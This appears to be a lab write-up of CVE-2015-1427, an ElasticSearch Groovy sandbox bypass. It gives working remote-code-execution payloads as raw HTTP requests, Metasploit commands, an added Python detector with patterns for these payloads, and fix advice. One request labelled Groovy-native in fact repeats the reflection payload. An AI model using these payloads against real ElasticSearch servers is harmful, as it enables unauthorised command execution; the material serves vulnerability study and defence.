CVE-2015-1427 ElasticSearch (Groovy sandbox bypass && Code Execution Vulnerability)

Vulnerability profile

After CVE-2014-3120, the default dynamic scripting language of ElasticSearch was changed to Groovy and a sandbox was added, but direct execution of dynamic scripts is still supported by default. This vulnerability has two parts: 1. a sandbox bypass; 2. code execution.

The reason for the vulnerability is very simple: the sandbox's blacklist of dangerous Java methods is incomplete, so a malicious user can still use reflection to execute Java code. Is that all? Of course not! Ironically, the Elasticsearch development team did not fully appreciate the power of Groovy and believed that merely preventing users from calling Java reflection would protect against attacks. Let's take a look at Groovy's description:

[Image: Groovy language description]

That's right! Groovy is a full programming language, which means code execution can be achieved without touching Java at all. If this were only a sandbox problem, fixing the blacklist/whitelist so that an attacker can no longer bypass the sandbox and reach Java reflection would be enough. But how can a blacklist/whitelist restrict most of a language's own features? So the real root cause of this problem is using Groovy, a general-purpose programming language, as the scripting language.

Groovy language sandbox

ElasticSearch supports the use of Groovy "in a sandbox" as its dynamic scripting language, but clearly the official implementation falls short. lupin and tang3 each proposed a method to execute commands:

  1. Since Java code runs inside a sandbox, lupin's method is to find a way to bypass the sandbox, for example via Java reflection.

  2. Groovy is a language in its own right, so tang3 took another route: use the methods the Groovy language itself supports to execute commands directly, without going through Java.

Therefore, following these two approaches, we obtain two different PoCs.

Java sandbox bypass method:
java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
Groovy direct command execution method:
def command='id';def res=command.execute().text;res
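A defender-side check for the two routes described above, written as an added example for this article (not code from the original post or from ElasticSearch): it walks a captured _search request body, extracts every inline script, and labels whether it resembles the reflection route, the Groovy-native execute() route, or is simply a dynamic Groovy script. The request bodies are constructed to mirror the PoCs; treating a script with no "lang" as Groovy follows from the page's statement that Groovy became the default scripting language.

```python
import json
import re

# Markers for the two execution routes the write-up describes: reflection out
# of the Groovy sandbox, and Groovy's own String.execute() (no Java needed).
REFLECTION_PATTERNS = [r"\.class\.forName\s*\(", r"Class\.forName\s*\(",
                       r"getRuntime\s*\(\s*\)", r"\.exec\s*\("]
GROOVY_NATIVE_PATTERNS = [r"\.execute\s*\(\s*\)", r"ProcessBuilder"]

# Constructed request bodies shaped like the ones in this write-up (not live traffic).
SAMPLE_BODIES = {
    "reflection": '{"size":1,"script_fields":{"f":{"lang":"groovy","script":"java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"id\\").getText()"}}}',
    "native": '{"size":1,"script_fields":{"f":{"script":"def command=\'id\';def res=command.execute().text;res"}}}',
    "benign": '{"size":1,"script_fields":{"f":{"lang":"groovy","script":"doc[\'price\'].value * 2"}}}',
    "no_script": '{"query":{"match_all":{}}}',
}

def find_inline_scripts(node, found=None):
    """Collect (lang, script) for every inline string script anywhere in the body."""
    if found is None:
        found = []
    if isinstance(node, dict):
        if isinstance(node.get("script"), str):
            # Assumption from the page: ES 1.x runs an inline script as Groovy when "lang" is omitted.
            found.append((node.get("lang", "groovy"), node["script"]))
        for value in node.values():
            find_inline_scripts(value, found)
    elif isinstance(node, list):
        for item in node:
            find_inline_scripts(item, found)
    return found

def classify_script(lang, script):
    """Label one script: which execution route it resembles, and whether it is dynamic Groovy."""
    labels = set()
    if any(re.search(p, script) for p in REFLECTION_PATTERNS):
        labels.add("java-reflection")
    if any(re.search(p, script) for p in GROOVY_NATIVE_PATTERNS):
        labels.add("groovy-native-exec")
    if lang.lower() == "groovy":
        labels.add("dynamic-groovy-script")  # any inline Groovy is dynamic scripting
    return labels

def inspect_search_body(raw_body):
    """Parse a _search body and return [(lang, labels, script)]; bad JSON yields one marker finding."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return [("invalid-json", set(), raw_body[:80])]
    return [(lang, classify_script(lang, script), script)
            for lang, script in find_inline_scripts(body)]

if __name__ == "__main__":
    for name, raw in SAMPLE_BODIES.items():
        print(name, inspect_search_body(raw))
```

The same walk works for any request body that carries inline scripts (script_score, _update), not only script_fields, since it matches on the "script" key wherever it occurs.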

Reproducing the vulnerability

Start the environment: docker compose up -d

After the environment starts, visit http://your-ip:9200 and you will see the default ElasticSearch homepage.

[Image: ElasticSearch default homepage at http://127.0.0.1:9200/]

Since at least one document must exist in ES for the query to work, send the following request to add one document:

POST /website/blog/  HTTP/1.1
Host: 127.0.0.1:9200
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 30

{
	  "name": "guiltyfet"
}

Payload that uses the reflection mechanism to execute Java code:

POST /_search?pretty HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 491

{
    "size":1,
    "script_fields": {
        "test#": {
            "script": "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getInputStream())).readLines()",
            "lang": "groovy"
        }
    }
}

[Image: execution result]

Executing commands using the Groovy language:

POST /_search?pretty HTTP/1.1
Host: 127.0.0.1:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 164

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

MSF:
use exploit/multi/elasticsearch/search_groovy_script
set RHOST X.X.X.X
set LHOST X.X.X.X
show options
exploit

Fix

Method 1: upgrade to the latest official version.
Method 2: in the ElasticSearch directory, add the following line to config/elasticsearch.yml: script.groovy.sandbox.enabled: false

Tags: Apache solr lucene

Posted on Tue, 16 Nov 2021 21:03:44 -0500 by SirJinX